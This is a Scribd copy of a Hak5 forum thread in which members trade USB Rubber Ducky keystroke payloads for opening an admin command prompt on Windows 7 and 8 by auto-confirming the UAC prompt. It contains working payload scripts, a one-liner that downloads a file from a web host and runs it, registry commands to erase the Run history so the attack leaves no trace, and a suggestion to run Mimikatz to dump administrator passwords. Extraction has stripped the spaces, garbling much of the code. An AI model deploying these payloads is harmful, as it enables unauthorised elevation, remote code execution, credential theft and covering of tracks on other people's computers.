Scribd
Upload
700 views13 pages

Rubber Ducky

This discussion explores methods for bypassing the Windows User Account Control (UAC) dialog using a USB Rubber Ducky. The initial payload used a Visual Basic script to bypass UAC in 7 seconds. Users then try different techniques to further reduce the time, with one achieving bypass in 2.7 seconds using the runas command. The discussion also covers securely cleaning up artifacts left after the bypass.

Uploaded by

ShopnoPathik Aion
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
700 views13 pages

Rubber Ducky

This discussion explores methods for bypassing the Windows User Account Control (UAC) dialog using a USB Rubber Ducky. The initial payload used a Visual Basic script to bypass UAC in 7 seconds. Users then try different techniques to further reduce the time, with one achieving bypass in 2.7 seconds using the runas command. The discussion also covers securely cleaning up artifacts left after the bypass.

Uploaded by

ShopnoPathik Aion
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 13

Hak5Forums

Browse
Forums

Existinguser?SignIn

SignUp

Search...

Activity
Staff

OnlineUsers

Home ActiveProjects USBRubberDucky [Payload]FasterUACBypass

AllActivity

Archived
Thistopicisnowarchivedandisclosedtofurtherreplies.

[Payload]FasterUACBypass
StartedbyDarrenKitchen,August19,2013

17postsinthistopic

DarrenKitchen
Hak5Junkie

PostedAugust19,2013

TheduckisprettygoodatbypassingUAC.Let'smakeitbetter.
REM*********************************
REMPayload:OldMethodtoBypassUAC
REMTarget:Window7
REMAuthor:DarrenKitchen

RootAdmin
4,457posts
Gender:Male
Location:SanFrancisco,CA

REM*********************************
GUI
DELAY500
STRINGcmd

DELAY3000
MENU
DELAY2000
STRINGa
REM*************************************************************
REMDependingonWindowsVersionanENTERcouldbenecessaryhere
REM*************************************************************
DELAY3000
LEFT
ENTER
DELAY500
STRINGechoAdminPromptin9seconds

Notbad.Let'sshaveanother2secondsoff...
REM********************************
REMPayload:LessFinickyUACBypass
REMTarget:Window7
REMAuthor:DarrenKitchen
REM********************************
GUIr
DELAY500
STRINGcmd
ENTER
DELAY500
STRINGcopyconsudo.cmd
ENTER
STRING@echoSetobjShell=CreateObject("Shell.Application")>%temp%\sudo.tmp.vbs
ENTER
STRING@echoargs=Right("%*",(Len("%*")Len("%1")))>>%temp%\sudo.tmp.vbs
ENTER
STRING@echoobjShell.ShellExecute"%1",args,"","runas">>%temp%\sudo.tmp.vbs

ENTER
STRING@cscript%temp%\sudo.tmp.vbs
ENTER
CTRLz
ENTER
STRINGsudo.cmdcmd
ENTER
DELAY3000
ALTy
DELAY500
STRINGechoAdminPromptin7seconds

Notbad.Let'sshaveanother2secondsoff...
REM********************************************
REMPayload:FastestUACBypassusingPowershell
REMTarget:Window7
REMAuthor:DarrenKitchen
REM********************************************
GUIr
DELAY500
STRINGpowershellStartProcesscmdVerbrunAs
ENTER
DELAY3000
ALTy
DELAY500
STRINGechoAdminPromptin5seconds

Notbad.Let'sshaveanother2secondsoff...?
Thoughts?

strangelaw
Newbie

PostedAugust19,2013

(FromBrutelogic)>bitsadmin/transfernhttp://domain/file
c:\%homepath%\file&&c:\%homepath%\file
0

Members
2posts

DarrenKitchen

PostedAugust19,2013

Hak5Junkie

BITSADMINversion3.0[7.5.7601]
BITSadministrationutility.
(C)Copyright20002006MicrosoftCorp.
BITSAdminisdeprecatedandisnotguaranteedtobeavailableinfutureversionsofWindows.
RootAdmin
4,457posts
Gender:Male
Location:SanFrancisco,CA

AdministrativetoolsfortheBITSservicearenowprovidedbyBITSPowerShellcmdlets.

Whichiswhy....
powershell(newobjectSystem.Net.WebClient).DownloadFile('http://example.com/bob.old','%temp%\bob.exe'

Howevercool,itstilldoesn'topenacommandpromptbypassingUAC.

overwraith
Hak5Ninja

PostedAugust19,2013

IfoundawebsitethathasawaytoturnoffUACbycommandline.Don'tknowifUACwillstillbugyouduringthe
turnoffprocedurethough.
http://www.howtogeek.com/howto/windowsvista/enableordisableuacfromthewindowsvistacommandline/
0

ActiveMembers
732posts
Gender:Male

nikkelitous

PostedAugust20,2013

Newbie

On20/08/2013at4:06AM,overwraithsaid:

IfoundawebsitethathasawaytoturnoffUACbycommandline.Don'tknowifUACwillstillbugyou
duringtheturnoffprocedurethough.
Members
1post

http://www.howtogeek.com/howto/windowsvista/enableordisableuacfromthewindowsvistacommand
line/

Unfortunately,thismethodrequiresareboot.ThoughitdoescompletelydisableUACratherthanjustaoneoff.
0

BuckoA51

PostedAugust20,2013

Hak5Fan++

Thecountermeasuretothisis,ofcourse,don'trunasadmin,sothateverytimeUACpopsupyouhavetoput
youradminpasswordin.Thisishowacorporatedesktopshouldbeconfiguredanyway,(orwithUACoffand
nonadminaccountsforthestaff).
0

ActiveMembers
73posts
Gender:Male
Location:UK

DarrenKitchen

PostedAugust20,2013

Hak5Junkie

On20/08/2013at5:16PM,BuckoA51said:

Thecountermeasuretothisis,ofcourse,don'trunasadmin,sothateverytimeUACpopsupyouhaveto
putyouradminpasswordin.Thisishowacorporatedesktopshouldbeconfiguredanyway,(orwithUAC
offandnonadminaccountsforthestaff).
RootAdmin
4,457posts
Gender:Male
Location:SanFrancisco,CA

411Hall
Hak5Fan+

Emphasismine.
1

PostedAugust26,2013

Goodstuff!IhavereplacedtheToolkitsmethodwiththisone.
0

ActiveMembers
43posts

BuckoA51

PostedAugust30,2013

Hak5Fan++

Quote
Emphasismine.
TootrueDarrenIknow,lastcompanyIwasatdoingaquickaudit,theyhadWindows7andhalfthestaffwere
runningasadminwithUACon,theotherhalfasadminwithUACdisabled,because,youknow,it'ssuchabindto
click"Yes"everynowandagain.

ActiveMembers
73posts
Gender:Male
Location:UK

tom564

PostedSeptember5,2013

Hak5Fan++

On20/08/2013at0:49AM,DarrenKitchensaid:

REM********************************
REMPayload:LessFinickyUACBypass
REMTarget:Window7
ActiveMembers
95posts

REMAuthor:DarrenKitchen
REM********************************
GUIr

DELAY500
STRINGcmd
ENTER
DELAY500
STRINGcopyconsudo.cmd
ENTER
STRING@echoSetobjShell=CreateObject("Shell.Application")>%temp%\sudo.tmp.vbs
ENTER
STRING@echoargs=Right("%*",(Len("%*")Len("%1")))>>%temp%\sudo.tmp.vbs
ENTER
STRING@echoobjShell.ShellExecute"%1",args,"","runas">>%temp%\sudo.tmp.vbs
ENTER
STRING@cscript%temp%\sudo.tmp.vbs
ENTER
CTRLz
ENTER
STRINGsudo.cmdcmd
ENTER
DELAY3000
ALTy
DELAY500
STRINGechoAdminPromptin7seconds

Notbad.Let'sshaveanother2secondsoff...
REM********************************************
REMPayload:FastestUACBypassusingPowershell
REMTarget:Window7
REMAuthor:DarrenKitchen
REM********************************************
GUIr
DELAY500

STRINGpowershellStartProcesscmdVerbrunAs
ENTER
DELAY3000
ALTy
DELAY500
STRINGechoAdminPromptin5seconds

Notbad.Let'sshaveanother2secondsoff...?
Thoughts?

HavingpowershellStartProcesscmd.exeVerbrunAsasthelastruncommandintherunpromptwouldmake
mesuspiciousifisawit,isthereanywayyoucancleanupaftertoremovetheobvioustrace?
0

Xcellerator
Hak5Pirate

PostedSeptember6,2013

YoucandeletetheentirehistoryfromtheRundialogusing
regdeleteHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU/va/

or,youcanspecifywhatexactcommandyouwantremovedwiththis:
ActiveMembers
285posts
Gender:Male

for/f"tokens=1delims="%%Ain('regqueryHKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Ru

orchange"powershellStartProcesscmd.exeVerbRunAs"toanythingyoulike.

SN4T14

PostedSeptember11,2013

Newbie

CONTROLESCAPE
DELAY200
STRINGcmd
CTRLSHIFTENTER
Members
1post

DELAY2800
ALTy

Another2secondsshavedoff.)
Edit:Betterversionusingrunmenu,shouldworkwhenthere'salotofentriesinthestartmenu,anddoesn'tput
anunnecessary"y"intheCMDwindowifUACisoff.
GUIR
DELAY200
STRINGrunas/profile/user:%COMPUTERNAME%\Administrator"cmd"
ENTER
DELAY2700
ALTy
DELAY100
BACKSPACE

crackruckles
Newbie

PostedSeptember16,2013

1.PresstheWinkeyboardkeyorclickonVistaStartbutton.
TypecmdintotheStartSearchtextbox.
PressCtrl+Shift+Enterkeyboardshortcut.CtrlShiftEnteristhegeneralkeyboardshortcutthattriggerselevation
ActiveMembers
5posts

toRunasAdministrator.
PressAlt+CorpressContinuetoconfirmtheUACelevationwarningprompt.
http://www.mydigitallife.info/howtoopenelevatedcommandpromptwithadministratorprivilegesinwindows
vista/
0

factgasm
Hak5Fan++

PostedDecember3,2013

TheCTRL+SHIFT+ENTERcomboworksonthekeyboardbuthowdoyoucodethatinDuckyScript?CanDucky
Scripthandlethreekeysbeingpressedsimultaneously?
Itriedthisscriptearlieranditdidn'twork:
DEFAULTDELAY50
DELAY3000

ActiveMembers
110posts

CONTROLESCAPE
STRINGcmd
CONTROLSHIFTENTER
ALTY
EXIT
0

googleknowsbest
Hak5Fan

PostedDecember19,2013

DialogueboxisnothighlightedbeforetheALTy
Win8
0

ActiveMembers
18posts
Gender:Male
Interests:Computers!

Plazmaz
Newbie

PostedAugust19,2014

Youshouldbeabletousethisonwindows8.1:
GUIX
DOWN
DOWN

ActiveMembers
5posts
Gender:

DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
DOWN
ENTER
ALTy

MB60893
Hak5Zombie

PostedSeptember6,2014

Firstly,whenyoureferto"Bypass"UAC,whatyouarereallysayingisdon'tbringupthedialogboxsaying"Do
youwanttorunxyzprogramasAdministrator?".WhatIthinkwouldbebetteristogetadministratorrightsfroma
guestusers'perspective,justaboutguaranteeingthatanyprogramwouldworkifyouneededtoexecuteit.
IfIknewsomeonewhowasanadministrator,IwouldsimplywriteaduckyscriptusingtheCTRLSHIFTENTER
commandtoelevatePowershell,thenusethe"InvokeMimikatz"commandwith"DumpCreds".Thiswould

ActiveMembers
147posts
Gender:Male

outputtheadministratorpasswordforthecomputer(providingitisnotaWindows8/8.1machine).
Iknowthereisawayyoucanexecuteataskasanotheruser...soifyouknewtheadministratorpasswordfora
computer,youcouldsimplyrockupasaguest,andrunthetaskasanadminuser.Thoughts?
0

GOTOTOPICLISTING

USBRubberDucky

Home ActiveProjects USBRubberDucky [Payload]FasterUACBypass

CommunitySoftwarebyInvisionPowerServices,Inc.

AllActivity

You might also like